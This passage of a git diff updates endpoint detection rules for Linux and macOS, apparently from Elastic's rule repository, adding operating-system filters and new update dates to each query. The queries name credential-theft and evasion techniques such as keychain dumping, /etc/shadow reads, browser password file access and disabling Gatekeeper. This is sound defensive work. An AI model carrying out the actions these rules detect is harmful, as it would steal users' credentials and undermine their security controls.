+ [process where host.os.type == "linux" and process.name == "telnet" and event.type == "start"] + [network where host.os.type == "linux" and process.name == "telnet" and cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", diff --git a/rules/linux/persistence_chkconfig_service_add.toml b/rules/linux/persistence_chkconfig_service_add.toml index 217271f11..0ae49e23e 100644 --- a/rules/linux/persistence_chkconfig_service_add.toml +++ b/rules/linux/persistence_chkconfig_service_add.toml @@ -3,7 +3,7 @@ creation_date = "2022/07/22" maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/19" +updated_date = "2023/02/22" integration = ["endpoint"] [rule] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "linux" and event.type == "start" and ( (process.executable : "/usr/sbin/chkconfig" and process.args : "--add") or (process.args : "*chkconfig" and process.args : "--add") diff --git a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml index 0771b8679..0538db141 100644 --- a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml +++ b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/27" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:file and event.type:change and +event.category:file and host.os.type:linux and event.type:change and process.name:* and (file.path:(/usr/sbin/sshd or /usr/bin/ssh or /usr/bin/sftp or /usr/bin/scp) or file.name:libkeyutils.so) and not process.name:("dpkg" or "yum" or "dnf" or "dnf-automatic") diff --git a/rules/linux/persistence_dynamic_linker_backup.toml b/rules/linux/persistence_dynamic_linker_backup.toml index 100f37b25..634fbb50a 100644 --- a/rules/linux/persistence_dynamic_linker_backup.toml +++ b/rules/linux/persistence_dynamic_linker_backup.toml @@ -3,7 +3,7 @@ creation_date = "2022/07/12" maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/15" +updated_date = "2023/02/22" integration = ["endpoint"] [rule] @@ -27,8 +27,9 @@ type = "eql" query = ''' sequence by process.entity_id with maxspan=1m -[process where event.type == "start" and process.name : ("cp", "rsync") and process.args : ("/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2", "/etc/ld.so.preload")] -[file where event.action == "creation" and file.extension == "so"] +[process where host.os.type == "linux" and event.type == "start" and process.name : ("cp", "rsync") and + process.args : ("/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2", "/etc/ld.so.preload")] +[file where host.os.type == "linux" and event.action == "creation" and file.extension == "so"] ''' [[rule.threat]] diff --git a/rules/linux/persistence_etc_file_creation.toml b/rules/linux/persistence_etc_file_creation.toml index a6fa6abc0..21001ce16 100644 --- a/rules/linux/persistence_etc_file_creation.toml +++ b/rules/linux/persistence_etc_file_creation.toml @@ -3,7 +3,7 @@ creation_date = "2022/07/22" maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" integration = ["endpoint"] [rule] @@ -28,7 +28,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type == "creation" and user.name == "root" and +file where host.os.type == "linux" and event.type == "creation" and user.name == "root" and file.path : ("/etc/ld.so.conf.d/*", "/etc/cron.d/*", "/etc/sudoers.d/*", "/etc/rc.d/init.d/*", "/etc/systemd/system/*") and not process.executable : ("*/dpkg", "*/yum", "*/apt", "*/dnf", "*/systemd", "*/snapd", "*/dnf-automatic", "*/yum-cron", "*/elastic-agent", "*/dnfdaemon-system") diff --git a/rules/linux/persistence_insmod_kernel_module_load.toml b/rules/linux/persistence_insmod_kernel_module_load.toml index 7ec3a0beb..591662183 100644 --- a/rules/linux/persistence_insmod_kernel_module_load.toml +++ b/rules/linux/persistence_insmod_kernel_module_load.toml @@ -3,7 +3,7 @@ creation_date = "2022/07/11" maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" integration = ["endpoint"] [rule] @@ -27,7 +27,8 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and process.executable : "/usr/sbin/insmod" and process.args : "*.ko" +process where host.os.type == "linux" and event.type == "start" and + process.executable : "/usr/sbin/insmod" and process.args : "*.ko" ''' [[rule.threat]] diff --git a/rules/linux/persistence_kde_autostart_modification.toml b/rules/linux/persistence_kde_autostart_modification.toml index 3d3c5d46e..489c66972 100644 --- a/rules/linux/persistence_kde_autostart_modification.toml +++ b/rules/linux/persistence_kde_autostart_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,7 +34,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and +file where host.os.type == "linux" and event.type != "deletion" and file.extension in ("sh", "desktop") and file.path : ( diff --git a/rules/linux/persistence_shell_activity_by_web_server.toml b/rules/linux/persistence_shell_activity_by_web_server.toml index 873ff4b35..4045bd12c 100644 --- a/rules/linux/persistence_shell_activity_by_web_server.toml +++ b/rules/linux/persistence_shell_activity_by_web_server.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -74,7 +74,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:(bash or dash or ash or zsh or "python*" or "perl*" or "php*") and process.parent.name:("apache" or "nginx" or "www" or "apache2" or "httpd" or "www-data") ''' diff --git a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml index f3bb6ebd2..6c7d2d475 100644 --- a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml +++ b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -28,7 +28,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:file and not event.type:deletion and file.path:/etc/ld.so.preload +event.category:file and host.os.type:linux and not event.type:deletion and file.path:/etc/ld.so.preload ''' diff --git a/rules/linux/privilege_escalation_pkexec_envar_hijack.toml b/rules/linux/privilege_escalation_pkexec_envar_hijack.toml index 618680c73..79d8776f9 100644 --- a/rules/linux/privilege_escalation_pkexec_envar_hijack.toml +++ b/rules/linux/privilege_escalation_pkexec_envar_hijack.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where file.path : "/*GCONV_PATH*" +file where host.os.type == "linux" and file.path : "/*GCONV_PATH*" ''' diff --git a/rules/linux/privilege_escalation_shadow_file_read.toml b/rules/linux/privilege_escalation_shadow_file_read.toml index ec61e8606..de190da0d 100644 --- a/rules/linux/privilege_escalation_shadow_file_read.toml +++ b/rules/linux/privilege_escalation_shadow_file_read.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/23" +updated_date = "2023/03/01" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and event.action == "exec" and user.name == "root" +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and user.name == "root" and (process.args : "/etc/shadow" or (process.working_directory: "/etc" and process.args: "shadow")) and not process.executable: ("/usr/bin/tar", diff --git a/rules/linux/privilege_escalation_unshare_namesapce_manipulation.toml b/rules/linux/privilege_escalation_unshare_namesapce_manipulation.toml index 52917f273..3b9902dae 100644 --- a/rules/linux/privilege_escalation_unshare_namesapce_manipulation.toml +++ b/rules/linux/privilege_escalation_unshare_namesapce_manipulation.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and event.action : ("exec", "exec_event") and +process where host.os.type == "linux" and event.type == "start" and event.action : ("exec", "exec_event") and process.executable: "/usr/bin/unshare" and not process.parent.executable: ("/usr/bin/udevadm", "*/lib/systemd/systemd-udevd", "/usr/bin/unshare") and not process.args : "/usr/bin/snap" diff --git a/rules/macos/credential_access_access_to_browser_credentials_procargs.toml b/rules/macos/credential_access_access_to_browser_credentials_procargs.toml index 20b119839..a7e9eedcd 100644 --- a/rules/macos/credential_access_access_to_browser_credentials_procargs.toml +++ b/rules/macos/credential_access_access_to_browser_credentials_procargs.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.args : ( "/Users/*/Library/Application Support/Google/Chrome/Default/Login Data", diff --git a/rules/macos/credential_access_credentials_keychains.toml b/rules/macos/credential_access_credentials_keychains.toml index 3a447c4a9..2f1aaebad 100644 --- a/rules/macos/credential_access_credentials_keychains.toml +++ b/rules/macos/credential_access_credentials_keychains.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,7 +34,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.args : ( "/Users/*/Library/Keychains/*", diff --git a/rules/macos/credential_access_dumping_hashes_bi_cmds.toml b/rules/macos/credential_access_dumping_hashes_bi_cmds.toml index 9c88507f6..d41ca30f8 100644 --- a/rules/macos/credential_access_dumping_hashes_bi_cmds.toml +++ b/rules/macos/credential_access_dumping_hashes_bi_cmds.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:start and +event.category:process and host.os.type:macos and event.type:start and process.name:(defaults or mkpassdb) and process.args:(ShadowHashData or "-dump") ''' diff --git a/rules/macos/credential_access_dumping_keychain_security.toml b/rules/macos/credential_access_dumping_keychain_security.toml index 50737b541..85d09b4bf 100644 --- a/rules/macos/credential_access_dumping_keychain_security.toml +++ b/rules/macos/credential_access_dumping_keychain_security.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and process.args : "dump-keychain" and process.args : "-d" +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.args : "dump-keychain" and process.args : "-d" ''' diff --git a/rules/macos/credential_access_kerberosdump_kcc.toml b/rules/macos/credential_access_kerberosdump_kcc.toml index 5266adcc4..ace073d9f 100644 --- a/rules/macos/credential_access_kerberosdump_kcc.toml +++ b/rules/macos/credential_access_kerberosdump_kcc.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.name:kcc and process.args:copy_cred_cache ''' diff --git a/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml b/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml index e18a7223b..fde2a36d0 100644 --- a/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml +++ b/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -37,7 +37,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "macos" and event.type == "start" and process.name : "security" and process.args : "-wa" and process.args : ("find-generic-password", "find-internet-password") and process.args : ("Chrome*", "Chromium", "Opera", "Safari*", "Brave", "Microsoft Edge", "Edge", "Firefox*") and not process.parent.executable : "/Applications/Keeper Password Manager.app/Contents/Frameworks/Keeper Password Manager Helper*/Contents/MacOS/Keeper Password Manager Helper*" diff --git a/rules/macos/credential_access_mitm_localhost_webproxy.toml b/rules/macos/credential_access_mitm_localhost_webproxy.toml index 8a3c69138..872f7158e 100644 --- a/rules/macos/credential_access_mitm_localhost_webproxy.toml +++ b/rules/macos/credential_access_mitm_localhost_webproxy.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category : process and event.type : start and +event.category:process and host.os.type:macos and event.type:start and process.name : networksetup and process.args : (("-setwebproxy" or "-setsecurewebproxy" or "-setautoproxyurl") and not (Bluetooth or off)) and not process.parent.executable : ("/Library/PrivilegedHelperTools/com.80pct.FreedomHelper" or "/Applications/Fiddler Everywhere.app/Contents/Resources/app/out/WebServer/Fiddler.WebUi" or diff --git a/rules/macos/credential_access_potential_macos_ssh_bruteforce.toml b/rules/macos/credential_access_potential_macos_ssh_bruteforce.toml index be115470a..642a62a88 100644 --- a/rules/macos/credential_access_potential_macos_ssh_bruteforce.toml +++ b/rules/macos/credential_access_potential_macos_ssh_bruteforce.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ tags = ["Elastic", "Host", "macOS", "Threat Detection", "Credential Access"] type = "threshold" query = ''' -event.category:process and event.type:start and process.name:"sshd-keygen-wrapper" and process.parent.name:launchd +event.category:process and host.os.type:macos and event.type:start and process.name:"sshd-keygen-wrapper" and process.parent.name:launchd ''' diff --git a/rules/macos/credential_access_promt_for_pwd_via_osascript.toml b/rules/macos/credential_access_promt_for_pwd_via_osascript.toml index 17e59225a..a404e86cc 100644 --- a/rules/macos/credential_access_promt_for_pwd_via_osascript.toml +++ b/rules/macos/credential_access_promt_for_pwd_via_osascript.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and process.name : "osascript" and +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name : "osascript" and process.command_line : "osascript*display dialog*password*" ''' diff --git a/rules/macos/credential_access_systemkey_dumping.toml b/rules/macos/credential_access_systemkey_dumping.toml index 40256bcd3..73ab18fb6 100644 --- a/rules/macos/credential_access_systemkey_dumping.toml +++ b/rules/macos/credential_access_systemkey_dumping.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.args:("/private/var/db/SystemKey" or "/var/db/SystemKey") ''' diff --git a/rules/macos/defense_evasion_apple_softupdates_modification.toml b/rules/macos/defense_evasion_apple_softupdates_modification.toml index 2489f6c13..69ba7f1d4 100644 --- a/rules/macos/defense_evasion_apple_softupdates_modification.toml +++ b/rules/macos/defense_evasion_apple_softupdates_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.name:defaults and process.args:(write and "-bool" and (com.apple.SoftwareUpdate or /Library/Preferences/com.apple.SoftwareUpdate.plist) and not (TRUE or true)) ''' diff --git a/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml b/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml index 69a5e53a2..9ec1463be 100644 --- a/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml +++ b/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,7 +34,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name : "xattr" and ( (process.args : "com.apple.quarantine" and process.args : ("-d", "-w")) or diff --git a/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml b/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml index 0e490a060..406470e80 100644 --- a/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml +++ b/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.args:(spctl and "--master-disable") ''' diff --git a/rules/macos/defense_evasion_install_root_certificate.toml b/rules/macos/defense_evasion_install_root_certificate.toml index 1a41289ca..3e5071eb5 100644 --- a/rules/macos/defense_evasion_install_root_certificate.toml +++ b/rules/macos/defense_evasion_install_root_certificate.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.name:security and process.args:"add-trusted-cert" and not process.parent.executable:("/Library/Bitdefender/AVP/product/bin/BDCoreIssues" or "/Applications/Bitdefender/SecurityNetworkInstallerApp.app/Contents/MacOS/SecurityNetworkInstallerApp" ) diff --git a/rules/macos/defense_evasion_modify_environment_launchctl.toml b/rules/macos/defense_evasion_modify_environment_launchctl.toml index 2c07f5e0c..b5cf69d66 100644 --- a/rules/macos/defense_evasion_modify_environment_launchctl.toml +++ b/rules/macos/defense_evasion_modify_environment_launchctl.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:start and +event.category:process and host.os.type:macos and event.type:start and process.name:launchctl and process.args:(setenv and not (JAVA*_HOME or RUNTIME_JAVA_HOME or diff --git a/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml b/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml index dd16dfa94..f5b45a616 100644 --- a/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml +++ b/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -35,7 +35,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and process.name : "sqlite*" and +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name : "sqlite*" and process.args : "/*/Application Support/com.apple.TCC/TCC.db" and not process.parent.executable : "/Library/Bitdefender/AVP/product/bin/*" ''' diff --git a/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml b/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml index 0a39d60e1..7b889e155 100644 --- a/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml +++ b/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name:"scp" and process.args:"StrictHostKeyChecking=no" and process.command_line:("scp *localhost:/*", "scp *127.0.0.1:/*") and diff --git a/rules/macos/defense_evasion_safari_config_change.toml b/rules/macos/defense_evasion_safari_config_change.toml index 9007035ba..de8f67592 100644 --- a/rules/macos/defense_evasion_safari_config_change.toml +++ b/rules/macos/defense_evasion_safari_config_change.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:start and +event.category:process and host.os.type:macos and event.type:start and process.name:defaults and process.args: (com.apple.Safari and write and not ( diff --git a/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml b/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml index 746c3d203..742ae3a5f 100644 --- a/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml +++ b/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:file and not event.type:deletion and file.name:~$*.zip and host.os.type:macos +event.category:file and host.os.type:macos and not event.type:deletion and file.name:~$*.zip and host.os.type:macos ''' diff --git a/rules/macos/defense_evasion_tcc_bypass_mounted_apfs_access.toml b/rules/macos/defense_evasion_tcc_bypass_mounted_apfs_access.toml index f6244bcbf..e9e3a497a 100644 --- a/rules/macos/defense_evasion_tcc_bypass_mounted_apfs_access.toml +++ b/rules/macos/defense_evasion_tcc_bypass_mounted_apfs_access.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,8 +27,8 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category : process and event.type : (start or process_started) and process.name : mount_apfs and - process.args : (/System/Volumes/Data and noowners) +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.name:mount_apfs and + process.args:(/System/Volumes/Data and noowners) ''' diff --git a/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml b/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml index 211c7ac93..0cb1d180e 100644 --- a/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml +++ b/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -22,7 +22,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.name:kextunload and process.args:("/System/Library/Extensions/EndpointSecurity.kext" or "EndpointSecurity.kext") ''' diff --git a/rules/macos/discovery_users_domain_built_in_commands.toml b/rules/macos/discovery_users_domain_built_in_commands.toml index d5852cdd6..0cd8ff516 100644 --- a/rules/macos/discovery_users_domain_built_in_commands.toml +++ b/rules/macos/discovery_users_domain_built_in_commands.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/18" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and +process where host.os.type == "macos" and event.type in ("start", "process_started") and ( process.name : ("ldapsearch", "dsmemberutil") or (process.name : "dscl" and diff --git a/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml b/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml index b9feacbfb..7053ddcd0 100644 --- a/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml +++ b/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and process.args:("-e" and const*require*child_process*) +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.args:("-e" and const*require*child_process*) ''' diff --git a/rules/macos/execution_initial_access_suspicious_browser_childproc.toml b/rules/macos/execution_initial_access_suspicious_browser_childproc.toml index ca2de771e..a523e0c62 100644 --- a/rules/macos/execution_initial_access_suspicious_browser_childproc.toml +++ b/rules/macos/execution_initial_access_suspicious_browser_childproc.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.parent.name : ("Google Chrome", "Google Chrome Helper*", "firefox", "Opera", "Safari", "com.apple.WebKit.WebContent", "Microsoft Edge") and process.name : ("sh", "bash", "dash", "ksh", "tcsh", "zsh", "curl", "wget", "python*", "perl*", "php*", "osascript", "pwsh") and process.command_line != null and diff --git a/rules/macos/execution_installer_package_spawned_network_event.toml b/rules/macos/execution_installer_package_spawned_network_event.toml index 3d8c4d11d..82a1917e9 100644 --- a/rules/macos/execution_installer_package_spawned_network_event.toml +++ b/rules/macos/execution_installer_package_spawned_network_event.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = 